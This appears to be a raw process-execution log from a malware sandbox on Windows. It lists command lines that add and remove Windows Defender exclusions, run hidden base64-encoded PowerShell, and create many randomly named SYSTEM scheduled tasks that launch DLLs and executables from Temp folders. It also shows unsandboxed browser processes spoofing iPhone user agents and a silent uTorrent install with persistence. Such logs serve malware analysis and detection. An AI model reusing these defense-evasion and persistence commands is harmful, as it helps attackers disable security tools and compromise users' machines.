C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "grwmUrXfT" /SC once /ST 01:21:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "grwmUrXfT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2836 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2996 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3000 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4248 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "grwmUrXfT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "coQLnzjOCQIuUMNyn" /SC once /ST 00:20:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe\" Tp /CXZedidGJ 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "coQLnzjOCQIuUMNyn"

C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe

C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe Tp /CXZedidGJ 757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5404 -ip 5404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 820

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bhzAbyJhiYArNEwhRY"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OMeOFycTU\znOYOp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VGggbamSlsorNxx" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "VGggbamSlsorNxx2" /F /xml "C:\Program Files (x86)\OMeOFycTU\jJabmpg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "VGggbamSlsorNxx"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "VGggbamSlsorNxx"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "sWuJIXBYaMGWKZ" /F /xml "C:\Program Files (x86)\RnBNRnIwUzVU2\TrizmLz.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NNeqJVkrzmhrs2" /F /xml "C:\ProgramData\TtvXSoLtbVXOCJVB\AALhHIl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KHgAEdrkAvYTaiAFk2" /F /xml "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\fUiCNqd.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bvOgMXzRBPtqAKitkiY2" /F /xml "C:\Program Files (x86)\NOWTtjuGDiydC\dgUUnMX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kWTyeDFhQZoEtpUUx" /SC once /ST 01:12:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll\",#1 /jddidvrXq 757674" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kWTyeDFhQZoEtpUUx"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll",#1 /jddidvrXq 757674

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll",#1 /jddidvrXq 757674

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2116

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "nAKwq1" /SC once /ST 01:15:47 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "nAKwq1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2404 -ip 2404

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kWTyeDFhQZoEtpUUx"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "nAKwq1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "coQLnzjOCQIuUMNyn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6272 -ip 6272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6356 -ip 6356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 2328

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6112 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe

"C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe" /S

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /delete /tn "MyUTorrentTask" /f

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn "MyUTorrentTask" /tr "C:\Users\Admin\AppData\Roaming\utorrent\pro\uTorrentPro.exe /LHS" /sc minute /mo 10 /st 04:01 /du 02:00 /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2860 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2952 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2992 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3152 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4088 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2772 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

